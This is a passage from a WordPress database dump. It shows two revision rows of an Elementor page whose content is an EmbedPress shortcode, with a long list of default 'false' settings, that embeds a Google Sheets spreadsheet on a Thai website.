nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g/edit?gid=101226550#gid=101226550[/embedpress]','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:54:25','2025-07-01 07:54:25','',1571,'http://pakhaeng.ssk.in.th/?p=1589',0,'revision','',0),
(1590,1,'2025-07-01 14:54:25','2025-07-01 07:54:25','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g/edit?gid=101226550#gid=101226550\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g/edit?gid=101226550#gid=101226550[/embedpress]','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:54:25','2025-07-01 07:54:25','',1571,'http://pakhaeng.ssk.in.th/?p=1590',0,'revision','',0),
